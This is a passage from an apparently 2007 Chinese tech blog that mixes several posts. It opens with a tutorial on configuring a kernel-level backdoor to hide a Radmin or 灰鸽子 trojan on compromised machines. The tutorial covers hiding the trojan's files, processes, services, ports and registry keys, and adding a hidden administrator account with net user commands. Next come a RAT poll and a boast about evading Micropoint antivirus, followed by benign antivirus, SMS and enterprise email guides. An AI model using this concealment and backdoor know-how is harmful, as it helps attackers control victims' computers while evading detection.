1.管理员查下进程就OK了,
2.看下可以服务,因为鸽子他会加为服务,
3.netstat -an这个我就不用说了吧 大家都知道.
好了,现在我就为大家做个无敌神鸽,其实用一个软件就可以了,
黑客守卫者,一个内核级后门软件,先看下他的说明大家就都明白了,
黑客守护者是一款异常强大的驱动级后门!可以隐藏你的木马和后门的端口,服务,进程
这里写入你要隐藏的文件和文件夹名称
第一个是隐藏黑客守卫者自己的,建议不要删除
好,比如我们给肉鸡装了个Radmin吧,那我们就在隐藏文件里把它的服务端文件rserver.exe加到这里
注意一行一个哦~
你也可以用通配符*
这样到话只要是以rserv开头到文件夹和文件名都会隐藏
------------------------
隐藏进程和隐藏文件一样
我们把rserver.exe也加到这里
当然,它同样支持通配符*
下面是隐藏服务
Radmin的服务名是r_server
所以我们把它加到下面
------------------------
隐藏端口
4899是RADMIN到默认端口,TCP协议的,那么我们在TCP端口里面添上4899
可能你还开了肉鸡的3389,那我们把3389也加到里面,用[,]隔开
UDP端口和TCP端口一样
------------------------
隐藏注册表
已经有的是黑客守卫者自己的注册表项
你可以在这里把你的木马的注册表项隐藏
RADMIN的注册表项是RAdmin
所以我们加到里面就可以了
------------------------
跟随启动
就是让某个程序跟随黑客守卫者启动
它支持系统变量和运行参数
比如要肉鸡开机后添加一个用户
我们可以这样添
%windir%\system32\cmd.exe /c net user coofly 123456 /add
你要提权这个用户的话再加一个
%windir%\system32\cmd.exe /c net localgroup administrators coofly /add
这样就好了``
------------------------
后门设置
黑客守卫者启动后,你可以从任意一个端口用黑客守卫者提供的客户端进行连接,得到一个管理员权限的CMD SHELL
连接密码就是你登录SHELL的密码了
黑客守卫者是以驱动和服务两种方法启动的
服务名称就是黑客守卫者的启动服务名称了
显示名称和描述大家应该都明白,如果改了服务名称,那么在隐藏服务里应该把改后的服务名称也加进去
比如我改成
hackdoor
那么我们应该在隐藏服务里它把也加进去
驱动名称和驱动文件名称可以随便改
不过要注意的是驱动文件名称必须是.SYS结尾的
------------------------
生成配置
现在已经配置好了,我们可以生成配置文件了
点生成配置,然后选择保存位置
添上文件名,点保存就可以OK咯!!~
现在大家应该明白怎么可以做出无敌的鸽子了吧!
因为黑客守卫者生成出来的是两个文件你要想和鸽子捆绑到一块可以用个凤凰的捆绑软件就可以了..[/post]
对世面上出现几款远控调查
上兴 18 票
牧民灰鸽子 8 票
网络红娘 3 票
守望者 4 票
熊宝宝远控 6 票
黑洞 13 票
黑赢 2 票
其他…… 9 票
病毒灰鸽子论坛管理员weiwen发的帖子:
今天对微点进行了一次鸽子上线的测试!
本帖被 weiwen 执行提前操作(2007-04-06)
今天对微点(微点主动防御软件(Micropoint Proactive Defense Software)) 进行了一次鸽子上线的测试,微点真是如用户所讲的如此历害吗?经过我半个小时的测试和修改(服务端不需要太大的修改),鸽子非常轻易的上线了(有图为 证),而且微点没有任何的提示(全开监控状态),对微点真是非常失望,经过这么多年的经验,个人感觉什么杀软都不可信,更不要信谁强谁弱,其实本质一样, 而且令我更加相信了杀软公司的商业行为,赚钱!!!!
注明:重启PC后微点同样没有任何的提示下上线!
测试后本人对微点杀软体会:集合了各大杀软的欺骗手法,换句话讲只是对鸽子代码比较了解深一些,并不是技术性的行为拦截和查杀。
看来还是杀软+防火墙+PG+还原工具或+虚拟机才能安全了
杀软+防火墙+hips,再加上良好的上网习惯。
用还原工具冰点(Deep freeze)就不用装虚拟机,“影子系统”这个软件的安全性我的评估(“影子系统”可能自身就是木马http://qxbbs.org/viewtopic.php?t=192973),而联想冰封可能是是中共邪教中科院的作品,也用不得
卡巴斯基“行为分析”以及“主动防御”技术、微点主动防御软件以及德国的小红伞AntiVir都在灰鸽子管理员的破坏之列,看来杀软真的不可信
Labels: antivirus
免费的安全盛宴
本贴宗旨:(卡饭论坛独家首发,如需转贴敬请注明出自卡饭论坛)
1. 免费的同时考虑其性能和口碑,更多免费AV+FW请参考这里:
http://www.kpfans.com/bbs/viewthread.php?tid=14608&highlight=%CD%EA%C8%AB%C3%E2%B7%D1
2. 不涉及版权问题,使用以下软件,您将是百分之百的正版用户!
(因此本贴不讨论Mcafee, Norton等软件的使用问题 )
3. 终身免费,不是试用!
4. 友情提醒:根据免费软件的使用协议,您如果使用后依然中毒,或导致系统冲突,进而引起数据损毁甚至硬件损坏等不良后果一概由您自行承担。因此如果您对软件尚不甚了解,请到论坛各专区学习,或请专人指导,或发帖求助。
5. 关于某些测试方法:
网上流行的将一段代码保存为文本文件来测试杀软,这一测试是否科学暂且不论,但文本文件是目前很多先进杀软默认不监控的文件类型,所以应先把监控文件类型调整为“所有”,再测试。
另外在线测试防火墙的网站很多,如果您是内网用户就免了,因为这些测试扫描的是您的路由或网关,而不是本机。
如果不考虑英文版本的因素,免费产品好过某些收费产品也是完全可能的!
组合1(适合各种个人用户使用)
免费C版小红伞Antivir(使用者所需英语程度:小学)+免费COMODO墙(科摩多防火墙首个支持的国际语言为中文)+SSM免费版(可选,不是必需,已有中文版)
Antivir来自德国的启发式杀软,资源占用较低,绝无卡机一说,目前第3代启发式引擎已经放出!卡饭论坛已于去年11月8日全国独家开辟专区予以介绍,故在此从略,请前往专区版面细看。Antivir设置比卡巴要简单许多,事实证明很多卡饭无需汉化就能自如使用英文版,因此Antivir的使用应该不是大问题(内核保护,因此没有汉化版)。
免费C版下载
Comodo Personal Firewall Pro来自英国的完全免费的强大防火墙
Comodo Firewall 的特点?
Comodo Firewall是少数完全实现TCP/UDP 全状态检测的个人防火墙。Comodo Firewall 自身集成了COMODO 已认证程序数据库,包括了近20000个通过认证的可执行文件的数字认证(校验)信息。
Comodo最大的特点是两层保护,网络防火墙和应用程序防火墙(应用程序+组件检测)。
网络防火墙:
网络防火墙通过全状态检测,可以追踪每一个接收和发送的数据包,并且对TCP, UDP, FTP等协议进行智能分析。还可以检测和防御DOS/DDOS 攻击: SYN/UDP/ICMP Floods, TCP/UDP Port Scans 。遇到DOS/DDOS攻击,将进入紧急状态,即使在用户毫不知情的情况下,可以根据攻击者的行为自动添加规则和调整内部状态,防御入侵。
应用程序防火墙:
网络防火墙主要用于来自外部的攻击,对于控制内部的病毒、木马等的网络活动,需要应用程序防火墙。
Comodo Firewall的应用程序防火墙是目前市面上最好的之一,应用程序过滤除了限制端口、协议等,还可以限制每分钟的连接数,还包括组件控制和程序行为分析。
Comodo 有一个最大的优点是它的防泄露(Anti-Leak)能力十分强大,可以通过目前已知的所有Leak-tests。对于保护隐私数据,防止恶意软件隐藏自己的行为,劫持信任程序,绕过防火墙,十分强大。
为了提供对恶意软件的总体解决方案,Comodo Firewall V3 将加入HIPS功能,敬请期待。
Comodo Firewall是终生免费,还是免费一年?
Comodo Firewall对个人和商业用户都是完全免费的。
2.4正式版采用了新的授权方式,安装过程中,将获得永久免费使用许可,而不再需要申请注册码。
COMODO是世界第二大全球认证数字证书服务商,对它的安全产品可以像对Norton、McAfee、Kaspersky一样信任,即使是免费产品,绝 不会捆绑任何垃圾在里面。提供高品质完全免费的桌面安全产品(包括杀毒软件、防火墙等等),是COMODO的一项市场策略,是为了提高品牌的知名度。当越 来越多的人使用 COMODO的桌面安全产品以后,就会促使更多的大型商业网站购买COMODO的数字认证,这才是它的主要收入来源,也是它免费的重要原因。
拦截木马实战:样本区有一个flo朋友编写的穿墙木马演示程序,您可以自行试验一下各种防火墙的拦截效果。事实证明Leak-test对个人桌面安全产品 的重要性,而Comodo强大的行为检测能力可见一斑。(试验时请关闭杀软和HIPS软件,flo放出这个程序的时候曾经过掉了各大杀软的启发式检测,当 然现在都已经上报了)
一般只有BT、EMULE和某些网络游戏的规则需要自设,请各位自行到专区谷歌一下,有现成的可用。
下载:
由于是终身免费,已集成了注册码,不再需要在线激活
目前的更新:最新测试版中已经集成一个终身KEY,装完在线激活即可。卡饭论坛已于07年1月1日特开辟专区予以介绍,请移步该区详细讨论。注意:简体中文版为官方汉化版本,并不支持中文的应用程序路径,请手动添加这些程序到信任区域即可。
目前的2.4.18.184正式版下载(请自行选择不同的语言版本)
http://www.personalfirewall.comodo.com/download_firewall.html
官方主页
http://www.comodogroup.com
Comodo Firewall v3将集成Sandbox和HIPS,到时就只需一个好的Anti-Virus即可高枕无忧,明年年初将出,敬请期待!
最新至强免费防火墙后补,PCTOOLS本月8日放出LNS核心的PC Tools Firewall Plus™ 1.0 for Windows。注册可选,完全免费!(LNS防火墙就不多作介绍了,请到专区查阅) 目前2.0.0.14版。可以跟踪观察后续版本推出。
下载:http://www.pctools.com/downloads/fwinstall.exe
来自俄罗斯的至强HIPS软件的免费版,仅比自家的收费版稍弱,不过也够用,免费版也有升级版本推出!
下载页面:http://syssafety.com/files.html
目前收费版为2.4.0.616(带网络功能)免费版为2.0.8.584-free(不带网络功能,比收费少一些拦截功能,从略),请根据需要下载即可。
组合2 (本组合安全性很高,但会牺牲部分使用上的便利。适用于不常安装新软件者使用,确保在干净无毒的新系统下安装好防火墙等所有软件,常用的网络软件让防火墙生成一下规则,最后再安装影子系统)
免费的影子系统+免费的COMODO/jetico防火墙
警告:经常需从“不安全”地带下载大量文件使用,或要与其它人交换文件者请使用组合1!影子系统用户最好配 备UPS电源系统使用。影子在软件层面相当于bios扩展而不是windows的一部分,作用于应用层之外,好处是程序极其健壮,不惧病毒和木马,不利的 一面是如果出现意外的情况(比如断电或未知的软件冲突)可能不是重装系统或者格式化系统分区就能解决的,敬请慎重选择!
最新影子系统简体中文免费版已经发布!
国产精品!官方已取消原来输入注册码解除时间限制的功能,改用在线激活方式,您只需要填入姓名和邮箱地址,就可以方便激活软件,激活后的软件将没有时间和功能限制,请放心使用!
对于全盘保护影子系统而言,本机已不怕病毒,故不装杀软,也免得影子重启将病毒库一并还原,多有不便。但是在影子系统里中木马,在重启之前还是有可能泄露ID信息,因此再装一个防木马外联泄露ID信息的墙即可。
组合3 EQSECURE+Antivir+Comodo
完全免费的4D防御组合,足以PK当今任何一种单一的收费互联网安全套装方案!强大的FD功能将使您轻松面对各种未知威胁!
其中值得一提的国产完全免费3D防护软件EqSecure V3.3,其规则高度可定制的特性使得其FD功能使用极为便利,如果您对HIPS尚不够熟悉,请到官方论坛置顶帖中学习。
注意:在EQ的AD和RD中要完全开放小红伞和comodo各可执行程序的权限,避免小红伞升级失败或comodo弹窗的现象(本组合资源占用令人满意,本人使用多日未出现任何不适症状
)官方下载
官方论坛
screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onmouseover="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://www.eqsecure.com/eqsyswatch/main.gif');}" onmousewheel="return imgzoom(this);" alt="" border="0">附录一:其它至强的免费安全软件:
强力后补:版本再次更新!免费的主动防御软件Novatix Cyberhawk(遗憾,没有中文版)适合各种用户使用,可替代组合1中的SSM,或与你手头的组合搭配使用。
简而言之,就是美国版的“微点”,对个人用户完全免费!
界面简约,资源占用为1服务1托盘程序,比微点略小,安装后无需用户进行任何特殊设置,工作原理与微点类似,行为判断,不依靠病毒库升级,防御未知病毒木马的“零日威胁”!目前PRO版(15天试用)已出,但原有免费功能依然保留!
官方定位为传统杀软的补充,用户如需经常下载文件收藏或与他人交换文件(主动防御软件和微点一样不提供右键扫描功能),则可搭配使用一款小红伞这样的杀软即可,实测无冲突!
下载
http://www.novatix.com/点击"Download Cyberhawk Now"按纽进入下载页面即可。
辅助AV:
俄罗斯DR.WEB官方绿色版,请参见版主pmj_sh所发的贴子:
http://www.kpfans.com/bbs/viewth ... &extra=page%3D1
罗马尼亚BitDefender Antivirus 8 Free Edition,bidanyang卡饭首发:
免费使用世界顶级杀软引擎的唯一机会!(注意:不能实时监控,无反间谍库,非绿色版)
英文版下载
http://www.bitdefender.com/PRODUCT-14-en--BitDefender-8-Free-Edition.html
繁体中文版下载
www.bitdefender.com.hk/site/Main/view/Download-Free-Products.html#
感谢bidianyang补充免费的芬兰防火墙jetico:(再次感谢ubuntu提供链接!)
官方下载
注意:此个人防火墙版本不支持WINDOWS 98/me ,安装前请卸载旧版本!建议具备对照日志可进行程序和规则调试能力的用户使用。
使用指南:推荐仔细阅读ubuntu大大所著两篇文章:
Jetico in ubuntu Way 之:牛刀小试
Jetico in ubuntu Way 之:去芜存菁
感谢visual4补充免费的国产风云防火墙,内存占用不过区区5M,功能却如OP(毫不逊色)。
官方论坛为卡饭结盟论坛:
下载最新1.23版(全功能免费版,需要及时升级者请支持国货,购买收费版)
感谢pmj_sh版主补充杀软Active Virus Shield(OEM版简装卡巴)和美国HIPS软件DSA
Active Virus Shield下载
DSA下载
感谢ubuntu对科摩多防火墙的指正并补充了免费的影子系统:12月7日最新推出简体中文免费版2.8!
简体中文官方主页
Labels: antivirus
Friday, April 13, 2007
6 个免费发短讯 SMS 的方法
我记得以前发短讯( SMS )的费用是很贵的,可是我们还是“乐此不疲”,往往不注意就花掉了几十块钱。
在马来西亚,我们要感谢 DiGi 的功劳,因为它的关系,我们现在可以享受到廉宜的手机网络服务。虽然现在使用手机发短讯已经很便宜,而且很方便,可是在某些时候我们还是有机会需要到互联网来发短讯。
我知道网上有许许多多让你发短讯的服务,可是有很多是挂羊头卖狗肉,在你注册了服务后千万百计“吃”你的钱,让你防不胜防,有些时候甚至只好放弃那个服务户口换新的,所以在使用这些服务前记得小心看清楚这些陷阱。
De Gardener 分享了一些优良的网络短讯服务该有的特征,在使用前你可以参考。
现在我们进入正题,让我告诉你 6 个免费发短讯的方法。
- MobiK
MobiK 让你在网上或手机上都可以免费发短讯 - Teleflip
Teleflip 让你使用电邮发短讯到手机,例如把电邮发到“电话号码@teleflip.com ” - Peekamo
Peekamo 就让你在网上直接发短讯 - Gizmo SMS
Gizmo SMS 也让你在网上发短讯 - TxtDrop
TxtDrop 同样让你免费发短讯,可是好像只允许北美的网民? - 最后一个方法就是你的手机网络服务商,他们通常会有一些让你在网上发短讯的免费服务,不过大部分都只能发给同样网络的手机号码。像 DiGi 的用户就可以登入它的网站发送免费短讯,每天首 5 封是免费的。
老实说,这 6 个方法中我亲身用过的只有第 1 和第 6 。
MobiK 的服务很不错,你只需要在每次发短讯时看一小段广告就可以无限次发送,发送的速度时快时慢,我试用的时候大部分的短讯都马上送到。
我本身是 DiGi 的用户,所以可以使用 DiGi 网站提供的免费短讯服务,我很多时候都有用到。
我什么时候会需要用到这些免费服务呢?
我最经常用的是 DiGi 的网站,通常的原因是我的手机发不出短讯,有时是网络出现问题,有时是我的手机出现毛病,这些时候这些服务就大派用场了。当然,你可能在其他或更多时候需要到它们。
除了 MobiK 以外的网站,大家看着办吧,因为我本身没有用过,这些网站是我在网上收集回来的,要是你有什么意见或用后感可以留言告诉我,我会把有用的资讯更新在这里。
digi现在,,每逢
星期一免费 bubble talk
—-3—–mms
—-5—–xms(这个爽,,=免费sms了。)
利用PPLIVE与flashget 下载电影!
我们利用PPLIVE看电影时,当遇到喜欢的电影想要保存下来时,在PPLIVE中是没有提供下载的。但是配合flashget等之类的软件就可以下载我们所看到的电影!打开pplive电视引擎,选好一个电影。再打开WMP(windows media player)就可以看电影了。这时,就可以准备下载电影了。点选文件菜单里面的属性项目时,就会出现电影的本地地址了:诸如此类形式的,http: //127.0.0.1:5001/dianying.asp 之类的地址。再把上述地址用flashget等软件下载就可以了。有的电影是一段一段的,右边的播放列表里面有好多时片段时,则必须全部下载。如果只是一整片,则不用麻烦了。值得注意的是,在下载过程中,不能关闭播放器,但可以暂停,此时下载软件仍然可以下载全部电影。如果关闭播放器,就不能下载了。当然也不能关闭了电视引擎,因为关闭引擎,就会关闭WMP!
Wednesday, April 11, 2007
google vs microsoft 邮件高级服务PK
随着网络的发展,电子邮件已经从原来单纯的个人通信手段,转化为企业重要的交流工具,微软和google的高级邮件服务也正是基于以上原因推向市场的.国内的一些邮箱也开始为用户提供类似企业邮箱的功能,但我还是选取了最具代表性的两大巨头的邮箱,来分析它们的服务特点.Read more »
Labels: email
Tuesday, April 10, 2007
让沟通更便携 主流企业邮箱导购
网络的普及,改变了人们传统的信息交流方式,尤其是电子邮件更是对传统邮件产生了巨大的冲击。可以说E-mail已经成为网民之间最主要的通讯方式之一。 目前在电子邮箱领域里,免费邮箱、收费邮件和企业邮箱三足鼎力,各有各的用户群。而对于广泛的企业用户来说,则更加青睐高端的企业邮箱。
企业邮箱最主要的一点就是能够拥有个性化的域名。不管是免费邮箱还是 收费邮箱,都是采用服务商统一提供的域名作为邮箱后缀,在对于企业用户来说无法显示出公司的实力。而如果用自己企业的域名作为邮箱后缀,这无疑会给商务带 来便利,突显出企业的实力。其实使用企业邮箱,使得企业不必额外购买软件,直接可以基于WEB界面进行邮箱的分配管理,不必设有专门的人员进行维护,使其 应用成本降低。其次,企业邮箱没有垃圾邮件的烦恼,而且在安全、稳定性上都较免费邮箱、收费邮箱有较大的区别。因此对于企业用户来说,非常适合应用企业邮 箱服务。目前,提供企业邮箱服务的网站非常多,对于用户来说到底哪一家的服务才更符合自己呢?还是来看看我们的导购吧。
一、支持网络传真 新浪企业邮箱
网址:http://mail.sina.net/
价格:邮箱价格为每兆每年15元,邮箱空间50MB起销售,以10MB或100MB单位递增。
推荐理由:邮箱内置的网络传真功能,能够实现在线发送传真服务,为企业节省了费用,同时群发功能,为企业节省了大量的时间。
使用感受:
新浪企业邮箱依靠新浪公司强大的支持,能够支持多域名服务,可以直接使用企业申请的域名指向新浪企业邮箱,同时企业网络管理员可以自主的添加用户,并为 每个用户分配不同的使用空间,满足企业的不同需求。同时采用先进的加密传输技术,信息的多重加密、异地备份功能,保证信息不会泄漏、丢失,同时邮箱提供在 线杀毒功能,可以保证企业邮箱中不存在病毒,防止病毒入侵,保护整个企业的信息安全,另外邮箱提供了SMTP身份认证,确保收发邮箱的安全。
另外新浪企业邮箱提供的各项增值服务,为能够很好的管理各项任务,使得用户的工作更加得心应用,同时新浪企业邮箱服务器位于北京网通与电信机房中,很好 的解决了当前南北网络不通的局限性,使得一些大企业南北多个办事处间能够畅通的通信,可以说新浪企业邮箱是企业用户的首选。
产品介绍:
新浪企业邮箱管理平台功能强大,能够满足不同企业的各种需求,网络管理员可以根据需要完全自主的分配邮箱。另外新近增加的网络传真服务,为企业节约了大量的时间与经费,可以说新浪企业邮箱是企业用户的首选。
主要特点:
1、支持网络传真
新浪企业邮箱最近增添了网络传真服务,该服务采用了选进的IP网络连接技术,使用户可以以最安全的方式将图片、文件或其它各种文件以传真的方式传送到全世界的任何一个角落,遇到传真发送失败时还会自动重发。
2、邮箱管理平台
管理者可以方便的通过功能强大的邮箱管理平台,来对邮箱进行管理、设置,可以把邮箱后缀设置为自己的域名,同时可以自主的将邮箱用户进行分组,根据其业务量的大小来任意分配每人邮箱的数量及邮箱空间(图1)。
图1 |
3、多种增值服务
新浪企业邮箱提供了多种增值服务,其中包括企业主页、企业留言板、公告栏、日程提醒、书签、通讯录等功能,可以大大的提高工作效率。
4、反垃圾邮件功能
新浪企业邮箱具有强大的反垃圾邮件功能,采用了内容过滤算法,可以设置过滤规则组合:信头、信体、附件类型、大小、加密等,组合过滤搭配嵌套逻辑技术,同时配合客户端的过滤设置,最大限度的发现垃圾邮件,使企业不受垃圾邮件的骚扰(图2)。
图2 |
5、通信稳定性强
新浪企业邮箱服务器位于北京网通与电信机房,很好的解决了当前南北网络不通的局限性,使一些大企业南北多个办事住间能够畅通的通信。同时新浪邮箱在香港有两台转信服务器,对于一些发送失败数量大的收件域自动从国外转发。
二、超大附件 263天下邮
网址:http://gmail.263.net/
价格:5用户版邮箱总容量5GB,每年900元;10用户版邮箱总容量10GB,每年1600元;50用户版邮箱总容量50GB,每年7000元。
推荐理由:采用了国内最先进的反垃圾邮件技术,几乎可以完全过滤所有的垃圾邮箱。
使用感受:
263天下邮不愧为中国企业邮箱的第一品牌,提供了G级邮箱的空间,用户再也无需为邮箱的空间大小而烦恼了,无需再做清除邮箱操作,也不会出现邮箱装不 下的问题。263天下邮同样具有强大的后台管理功能,管理员可以在后台方便的添加、删除用户,还可以批量导入或是删除用户账户,方便的查询、修改用户所属 的部门,同时当企业加入了新的用户信息后,还可以直接将这些新添加的信箱作为地址本发布到用户邮箱中,或是以邮件的形式直接发布到用户的信息中,大大的方 便了用户在OE或Foxmail等客户端软件中直接导入地址。
图3
另外263企业邮箱考虑到了南北用户网络的限制,采用了双宽带接入服务,无论你是哪个服务商,都可以快速稳定的发送邮件,同时263天下邮提供的手机邮件功能,可以让用户方便快速的收发电子邮件,再也不用担心自己错过重要的邮件了。
产品介绍:
作为老牌的企业邮局服务提供商,263企业邮箱服务稳定,收发邮件快速、稳定,同时是国内提供企业邮箱空间最大的服务商,能够允许用户发送600MB的附件,使得大文件的传送方便快速。另外邮箱的垃圾邮件过滤功能非常强,能够几乎过滤所有的垃圾邮件。
主要特点:
1、G级邮箱 超大附件
263企业邮箱单用户最小空间为1GB,彻底打破了按MB销售的企业邮局模式,企业网络管理员无需再为不断扩容的邮箱空间而发愁,用户也无需为信箱经常 爆满、贻误重要信息而烦恼了。另外263企业邮箱具有600MB超大附件功能,无论对方邮箱大小,均可轻松以大附件方式发送600MB的文件。
2、强大的反垃圾邮件
263企业邮箱使用国家最新的863科研成果,并不断改进处理机制与用户感受,采用了三重过滤、五重净化功能,使得垃圾邮件过滤率大于96%,另外 263企业邮箱具有“不明文件夹”功能,当邮箱的反垃圾级别设置为“中级”或“高级”后,系统将对用户邮箱的邮件进行判别,把疑似垃圾邮件投递到用户的 “不明文件夹”中,减少接收垃圾邮件的机率(图4)。
图4
3、收发邮件快速稳定
263企业邮箱在北京、上海、广州都建有专业的IDC机房,采用了核心层电信网络双宽带介入模式,利用IP自动冗余技术,最优响应用户的邮件服务请求,为用户提供快速、安全、稳定的企业邮件服务,使用南北用户都能够快速收发邮件。
4、 手机邮件
263企业邮箱开通了手机邮件功能,这样就可以满足广大商务用户随时随地收发邮件的需求,用需只需发送短信即可定制该服务,轻楹享受手机移动办公的便利。当有邮箱收到后,系统会自动定时发送邮件到达通知,你就可以通过手机查收邮件、回复邮件了。
三、移动办公 搜狐企业邮箱
网址:http://mail.sohu.net
价格:邮箱价格为每兆每年15元,邮箱空间50MB起销售,扩容需为50MB的倍数。
推荐理由:手机MOBO移动办公服务,可以使用户使用手机即可接收邮件,从而避免错过客户的重要信件。
使用感受:
手机MOBO移动办公是搜狐企业邮箱的特色之处,通过手机MOBO功能,使得大部分手机都可以方便的收发电子邮件,同时该项服务几乎支持所有的手机,所 以用户无需单独购买手机即可使用该服务,用户在不错过重要邮件的同时,为企业在第一时间抓住了商机,创造更多的利润(图5)。
另外搜狐企业邮箱还提供了邮箱组管理功能,可以把公司的一个部门设置成一个分组,以方便管理员对其管理,同时邮箱具有群发功能,这样就大大的方便了企业 用户间发送邮件,只要选择要发送的多个邮箱地址或是分组,一次即可把邮件发送到所有企业员工的邮箱中。除了登录搜狐企业邮箱收发邮件外,该邮箱还允许用户 使用邮件客户端来收发邮件,搜狐企业邮箱可以支持包括Outlook Express、Foxmail或Netcape Mail等在内的常用的客户端软件。
图5
产品介绍:
使用搜狐企业邮箱,用户可以自主管理、分配邮箱数量、大小,同时邮箱支持组管理功能,可以把不同的部门设置为不同的分组,方便用户管理,另外搜狐企业邮箱提供的手机MOBO功能,大大方便了经常出差的朋友,使用手机就可以轻松的收发电子邮件,使你不再错过重要信件。
主要特点:
1、自主邮箱管理
搜狐企业邮箱支持自主划分与增、减邮箱个数,可以自行配置每个邮箱的容量,同时管理员可以自由分组,自由设置邮箱LOGO,登录窗口嵌入到企业网站等。总之,使用搜狐企业邮箱,企业完全可以自由定制自己的邮箱,保证邮箱能够方便的为用户服务。
2、安全强化、稳定可靠
搜狐企业邮箱提供了邮件底层级别的智能化反垃圾邮件防范措施,保证企业尽可能少的收到垃圾邮件,减小受到垃圾邮箱的骚扰。同时搜狐服务器机群采用了专业 负载均衡分摊负载,保障系统运行稳定,同时各种服务通过对保密机制及Versing的全球安全网站认证支持,避免黑客在网络传输中截获口令与信件,确保企 业相关信息的网络传输安全。
3、搜狐MOBO移动办公
为适应企业信息化的发展,搜狐企业邮局推出了MOBO服务,该服务可以实时安全的使用手机来接收邮箱,只要有中国移动网络覆盖的地方,就可以随时随地的使用该业务,同时该服务支持40多款中高端手机,具有强大的附件处理能力,特别适合经常出差的朋友使用。
四、视频邮件 21CN企业邮箱
网址:http://mail.21cn.com/corp/
价格:邮箱价格为每兆每年12元,邮箱空间100MB起销售,扩容最小容量单位为100MB。
推荐理由:21CN企业邮箱提供了视频邮件服务功能,通过该服务可以直接发送视频文件作为邮件内容给对方。
使用感受:
21CN企业邮箱允许用自主定义邮箱后缀,同时还可以更换LOGO及邮箱面板色调,能够满足用户的需求(图6)。另外邮箱在安全性方面作的也非常出色, 21CN企业邮箱提高了强大的在线杀毒、安全邮箱、又机备份、多重安全机制等功能,确保企业邮件信息高效、安全、稳定的传送,保证了不明不白件不会在传送 途中泄漏,被黑客截持,邮箱提供的邮件监控功能,可以使用管理员随时掌握邮箱的动态,保证邮箱的安全。
同时邮箱支持视频邮件发送功能,可以直接把企业的产品视频发送给客户。对于企业内部员工来说,21CN企业邮箱提供的群发公告功能,可以快速方便的把邮件发送到每一个用户的电子邮箱中,为企业员工带来了很大的便利,提高了工作效率。
图6 |
产品介绍:
21CN企业邮箱能够为企业带来快速、稳定的邮箱服务,同时用户的自定义功能强大,完全可以按照用户的需求来设置。另外视频邮件功能,给了你宣传企业产品的又一个途径。
主要特点:
1、安全便捷的管理功能
21CN企业邮箱提供了千万级的邮件系统,与China Net全国骨干网节点2.5G光纤直连,庞大的系统容量轻松实现企业内外的互联,能够满足众多企业的需要。后台提供了人性化的强大管理界面,实现企业邮箱 内部用户的管理与调整,用户可以自由设置企业邮箱的LOGO及模板色调,随时根据企业需要自主开设企业邮箱。
2、群发公告 增值服务
21CN企业邮箱提供管理员对邮箱内部用户分组,可以实现域内群发功能,为企业内部提供省时高效的沟通方式,只要轻松点击就可以把指定邮件发送到企业内 所有员工的邮箱中。另外邮箱还提供了多种增值服务,可以根据企业的自身需要,选择各种个性化的增值服务内容,如翻译邮箱、企业短信、邮件监控等,来满足不 同企业的多种需求。
3、视频邮件
21CN企业邮箱可以为你与你的朋友、客户搭建一个跨越国界、跨越地域的桥梁,同时该邮箱还支持视频信息传送功能,可以把你的视频作为邮箱直接传送给你的客户,让你的客户真实的感受到企业的优质产品与专业的服务。
五、免费到底 搜狗企业邮箱
网址:http://cmail.sogou.com/
价格:完全免费,用户可以免费使用。
推荐理由:完全免费的门户级个业邮箱,在提供强大服务支持的情况下,无需企业花费资金,即可享受到优质的服务。
使用感受:
邮箱免费不是一件稀奇的事情,但作为企业邮箱却是难能可贵的,搜狗是国内第一家提出免费企业邮箱的门户网站。虽然提供免费服务,但是搜狗企业邮箱的功能 却一点也没有缩水,功能完全可以与其它门户网站的企业邮箱相媲美,除了具有基本的企业邮箱功能外,搜狗企业邮箱还具有强大的垃圾邮件过滤与稳定可靠的服务 器机群。
另外搜狗企业邮箱采用了全新功能的 Webmail系统,能够全面兼容多种浏览器版本,提供用户级别的个性化配置选项,能够全方位支持Html超文本邮箱,还可以方便的导入同事邮箱,另时搜 狗企业邮箱还提供了内部添加Webmail企业论坛功能,可以大大的方便企业用户的内部交流(图7)。
图7
产品介绍:
搜狗企业邮箱提供免费服务,只需用户修改域名的MX记录,注册成功后即可免费使用,同时搜狗企业邮箱允许用户完全自主的配置邮箱,可以修改邮箱的LOGO、标题、后缀域名等,同时采用了全新的Webmail系统,能够方便企业用户的内部交流。
主要特点:
1、邮箱域自主管理
搜狗企业邮箱提供的单个邮箱容量最高达到1GB,同时允许用户自主更换后缀域名,管理员能够对内部邮箱分组管理,自主设置邮箱的大小及邮箱数量,以及针对企业论坛的创建管理和斑竹的权力指派。
2、个性化设置
企业使用搜狗企业邮箱,可以定制页面标题,定制页面的LOGO,同时可以同时增加批量用户,甚至可以把官方提供的HTML代码加入到主页后,即可通过主 页直接登录到企业邮箱中。管理员还可以统计邮箱的使用情况,包括建立邮箱的用户数量,占用空间的大小、剩余空间大小及总空间大小,同时还可以显示已建立邮 箱用户列表,可以修改用户姓名、密码、邮箱大小及删除某个用户等(图8)。
图8 |
3、垃圾过滤、稳定可靠
搜狗企业邮箱提供了邮件底层级别的智能化反垃圾邮件防范措施,保证企业尽可能少的收到垃圾邮件,减小受到垃圾邮箱的骚扰。同时搜狗服务器机群采用了专业 负载均衡分摊负载,保障系统运行稳定,各种服务通过对保密机制及Versing的全球安全网站认证支持,避免黑客在网络传输中截获口令与信件,确保企业相 关信息的网络传输安全。
六、不限附件大小 TOM企业邮箱
网址:http://www.tomcmail.com/
价格:50MB每年600元,100MB每年1200元,200MB每年2200元,首次购买最低 邮箱容量为50MB,扩容单位最小为50MB。
推荐理由:TOM企业邮箱的用户在发送邮件附件时不限附件大小,这样用户在使用邮箱发送大文件时,就无需考虑附件大小的问题了。
使用感受:
TOM企业邮箱除了具有企业邮箱基本的自定义邮箱后缀,修改企业LOGO等功能外,还提供了不限附件大小的收发邮件功能,这样就使得在邮箱内传送大文件 变得轻松了许多,同时还可以直接使用多种客户端来收发邮件,另外邮箱服务器还安装了可以自动升级的杀毒引擎,对进入邮箱系统的邮箱进行病毒监测,可以根据 不同的检测结果来对邮件做不同的处理,保证了企业用户邮箱系统的安全。
产品介绍:
TOM企业邮箱提供了强大的后台管理,同时为企业提供了多种风格页面进行选择,另外邮箱还提供了在线杀毒功能,用户可以自己定义病毒的处理方式,保证了邮箱中邮件的安全。
主要特点:
1、强大的管理功能
